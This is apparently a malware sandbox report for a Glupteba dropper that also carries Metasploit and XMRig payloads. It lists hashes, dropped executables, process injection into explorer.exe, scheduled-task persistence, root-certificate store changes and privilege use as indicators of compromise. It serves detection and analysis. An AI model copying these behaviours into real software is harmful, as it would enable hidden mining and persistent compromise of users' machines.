glupteba | 8050946d45275d1d9a207b61e1e7c69f906193fe120b111497bb15960f9ca379

Analysis

max time kernel
167s
max time network
169s
platform
windows7_x64
resource
win7-en
submitted
10-09-2021 21:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fri192f077acf656dd.exe
Size

116KB
MD5

f43d41f88c343d2d97c010ec7269320d
SHA1

93d2e9e30cc7db5615bb113293ce2b24b848368a
SHA256

30d2e1ce1f57936fae0b6c7f70917e5b352dc8a891b3d012f762f79d2c46ccc1
SHA512

61282378378304381502cf3e6dd2d88e20345d1a62286893eae7d3101016f71823c341ad0c18865dce6c3a8e98f26e6657cdf65a30cfac171ca9cd04aac45db6

Score

10^/10

glupteba metasploit xmrig backdoor dropper loader miner trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral11/memory/1084-136-0x00000000043C0000-0x0000000004CDE000-memory.dmp	family_glupteba
behavioral11/memory/1084-138-0x0000000000400000-0x0000000002577000-memory.dmp	family_glupteba
behavioral11/memory/2268-140-0x0000000000400000-0x0000000002577000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral11/memory/2752-163-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig
behavioral11/memory/2752-164-0x00000001402F327C-mapping.dmp	xmrig
behavioral11/memory/2752-166-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 13 IoCs

Processes:

Chrome 5.exe1.exe2.exe3.exe4.exe5.exe6.exe7.exeBearVpn 3.exeLzmwAqmV.exeLzmwAqmV.exeservices64.exesihost64.exe

pid	process
1152	Chrome 5.exe
1748	1.exe
316	2.exe
1728	3.exe
1284	4.exe
1528	5.exe
1764	6.exe
1140	7.exe
1700	BearVpn 3.exe
1084	LzmwAqmV.exe
2268	LzmwAqmV.exe
2444	services64.exe
2620	sihost64.exe

Loads dropped DLL 11 IoCs

Processes:

Fri192f077acf656dd.exeChrome 5.exeservices64.exe

pid	process
1644	Fri192f077acf656dd.exe
1644	Fri192f077acf656dd.exe
1644	Fri192f077acf656dd.exe
1644	Fri192f077acf656dd.exe
1644	Fri192f077acf656dd.exe
1644	Fri192f077acf656dd.exe
1644	Fri192f077acf656dd.exe
1644	Fri192f077acf656dd.exe
1644	Fri192f077acf656dd.exe
1152	Chrome 5.exe
2444	services64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 2444 set thread context of 2752 2444 services64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	pid	process	target process
PID 2444 set thread context of 2752	2444	services64.exe	explorer.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1824	1728	WerFault.exe	3.exe
1916	1284	WerFault.exe	4.exe
1112	1140	WerFault.exe	7.exe
1660	1528	WerFault.exe	5.exe
692	1764	WerFault.exe	6.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2608 schtasks.exe
2420 schtasks.exe

pid	process
2608	schtasks.exe
2420	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

LzmwAqmV.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	LzmwAqmV.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

LzmwAqmV.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	LzmwAqmV.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	LzmwAqmV.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	LzmwAqmV.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeLzmwAqmV.exeChrome 5.exeservices64.exeexplorer.exe

pid	process
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe
1916	WerFault.exe
1824	WerFault.exe
1824	WerFault.exe
1824	WerFault.exe
1824	WerFault.exe
1824	WerFault.exe
1824	WerFault.exe
1660	WerFault.exe
1660	WerFault.exe
1660	WerFault.exe
1660	WerFault.exe
1660	WerFault.exe
1660	WerFault.exe
1112	WerFault.exe
1112	WerFault.exe
1112	WerFault.exe
1112	WerFault.exe
1112	WerFault.exe
1112	WerFault.exe
692	WerFault.exe
692	WerFault.exe
692	WerFault.exe
692	WerFault.exe
692	WerFault.exe
692	WerFault.exe
1084	LzmwAqmV.exe
1152	Chrome 5.exe
2444	services64.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe
2752	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid process

1916 WerFault.exe
1112 WerFault.exe
1660 WerFault.exe
1824 WerFault.exe
692 WerFault.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

1.exe2.exe3.exe4.exe5.exe6.exe7.exeBearVpn 3.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeLzmwAqmV.exeChrome 5.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1748	1.exe
Token: SeDebugPrivilege	316	2.exe
Token: SeDebugPrivilege	1728	3.exe
Token: SeDebugPrivilege	1284	4.exe
Token: SeDebugPrivilege	1528	5.exe
Token: SeDebugPrivilege	1764	6.exe
Token: SeDebugPrivilege	1140	7.exe
Token: SeDebugPrivilege	1700	BearVpn 3.exe
Token: SeDebugPrivilege	1916	WerFault.exe
Token: SeDebugPrivilege	1824	WerFault.exe
Token: SeDebugPrivilege	1660	WerFault.exe
Token: SeDebugPrivilege	1112	WerFault.exe
Token: SeDebugPrivilege	692	WerFault.exe
Token: SeDebugPrivilege	1084	LzmwAqmV.exe
Token: SeImpersonatePrivilege	1084	LzmwAqmV.exe
Token: SeDebugPrivilege	1152	Chrome 5.exe
Token: SeDebugPrivilege	2444	services64.exe
Token: SeLockMemoryPrivilege	2752	explorer.exe
Token: SeLockMemoryPrivilege	2752	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Fri192f077acf656dd.exe2.exe3.exe4.exe5.exe7.exe6.exeChrome 5.execmd.exe

description	pid	process	target process
PID 1644 wrote to memory of 1152	1644	Fri192f077acf656dd.exe	Chrome 5.exe
PID 1644 wrote to memory of 1152	1644	Fri192f077acf656dd.exe	Chrome 5.exe
PID 1644 wrote to memory of 1152	1644	Fri192f077acf656dd.exe	Chrome 5.exe
PID 1644 wrote to memory of 1152	1644	Fri192f077acf656dd.exe	Chrome 5.exe
PID 1644 wrote to memory of 1748	1644	Fri192f077acf656dd.exe	1.exe
PID 1644 wrote to memory of 1748	1644	Fri192f077acf656dd.exe	1.exe
PID 1644 wrote to memory of 1748	1644	Fri192f077acf656dd.exe	1.exe
PID 1644 wrote to memory of 1748	1644	Fri192f077acf656dd.exe	1.exe
PID 1644 wrote to memory of 316	1644	Fri192f077acf656dd.exe	2.exe
PID 1644 wrote to memory of 316	1644	Fri192f077acf656dd.exe	2.exe
PID 1644 wrote to memory of 316	1644	Fri192f077acf656dd.exe	2.exe
PID 1644 wrote to memory of 316	1644	Fri192f077acf656dd.exe	2.exe
PID 1644 wrote to memory of 1728	1644	Fri192f077acf656dd.exe	3.exe
PID 1644 wrote to memory of 1728	1644	Fri192f077acf656dd.exe	3.exe
PID 1644 wrote to memory of 1728	1644	Fri192f077acf656dd.exe	3.exe
PID 1644 wrote to memory of 1728	1644	Fri192f077acf656dd.exe	3.exe
PID 1644 wrote to memory of 1284	1644	Fri192f077acf656dd.exe	4.exe
PID 1644 wrote to memory of 1284	1644	Fri192f077acf656dd.exe	4.exe
PID 1644 wrote to memory of 1284	1644	Fri192f077acf656dd.exe	4.exe
PID 1644 wrote to memory of 1284	1644	Fri192f077acf656dd.exe	4.exe
PID 1644 wrote to memory of 1528	1644	Fri192f077acf656dd.exe	5.exe
PID 1644 wrote to memory of 1528	1644	Fri192f077acf656dd.exe	5.exe
PID 1644 wrote to memory of 1528	1644	Fri192f077acf656dd.exe	5.exe
PID 1644 wrote to memory of 1528	1644	Fri192f077acf656dd.exe	5.exe
PID 1644 wrote to memory of 1764	1644	Fri192f077acf656dd.exe	6.exe
PID 1644 wrote to memory of 1764	1644	Fri192f077acf656dd.exe	6.exe
PID 1644 wrote to memory of 1764	1644	Fri192f077acf656dd.exe	6.exe
PID 1644 wrote to memory of 1764	1644	Fri192f077acf656dd.exe	6.exe
PID 1644 wrote to memory of 1140	1644	Fri192f077acf656dd.exe	7.exe
PID 1644 wrote to memory of 1140	1644	Fri192f077acf656dd.exe	7.exe
PID 1644 wrote to memory of 1140	1644	Fri192f077acf656dd.exe	7.exe
PID 1644 wrote to memory of 1140	1644	Fri192f077acf656dd.exe	7.exe
PID 1644 wrote to memory of 1700	1644	Fri192f077acf656dd.exe	BearVpn 3.exe
PID 1644 wrote to memory of 1700	1644	Fri192f077acf656dd.exe	BearVpn 3.exe
PID 1644 wrote to memory of 1700	1644	Fri192f077acf656dd.exe	BearVpn 3.exe
PID 1644 wrote to memory of 1700	1644	Fri192f077acf656dd.exe	BearVpn 3.exe
PID 316 wrote to memory of 1084	316	2.exe	LzmwAqmV.exe
PID 316 wrote to memory of 1084	316	2.exe	LzmwAqmV.exe
PID 316 wrote to memory of 1084	316	2.exe	LzmwAqmV.exe
PID 316 wrote to memory of 1084	316	2.exe	LzmwAqmV.exe
PID 1728 wrote to memory of 1824	1728	3.exe	WerFault.exe
PID 1728 wrote to memory of 1824	1728	3.exe	WerFault.exe
PID 1728 wrote to memory of 1824	1728	3.exe	WerFault.exe
PID 1284 wrote to memory of 1916	1284	4.exe	WerFault.exe
PID 1284 wrote to memory of 1916	1284	4.exe	WerFault.exe
PID 1284 wrote to memory of 1916	1284	4.exe	WerFault.exe
PID 1528 wrote to memory of 1660	1528	5.exe	WerFault.exe
PID 1528 wrote to memory of 1660	1528	5.exe	WerFault.exe
PID 1528 wrote to memory of 1660	1528	5.exe	WerFault.exe
PID 1140 wrote to memory of 1112	1140	7.exe	WerFault.exe
PID 1140 wrote to memory of 1112	1140	7.exe	WerFault.exe
PID 1140 wrote to memory of 1112	1140	7.exe	WerFault.exe
PID 1764 wrote to memory of 692	1764	6.exe	WerFault.exe
PID 1764 wrote to memory of 692	1764	6.exe	WerFault.exe
PID 1764 wrote to memory of 692	1764	6.exe	WerFault.exe
PID 1152 wrote to memory of 2392	1152	Chrome 5.exe	cmd.exe
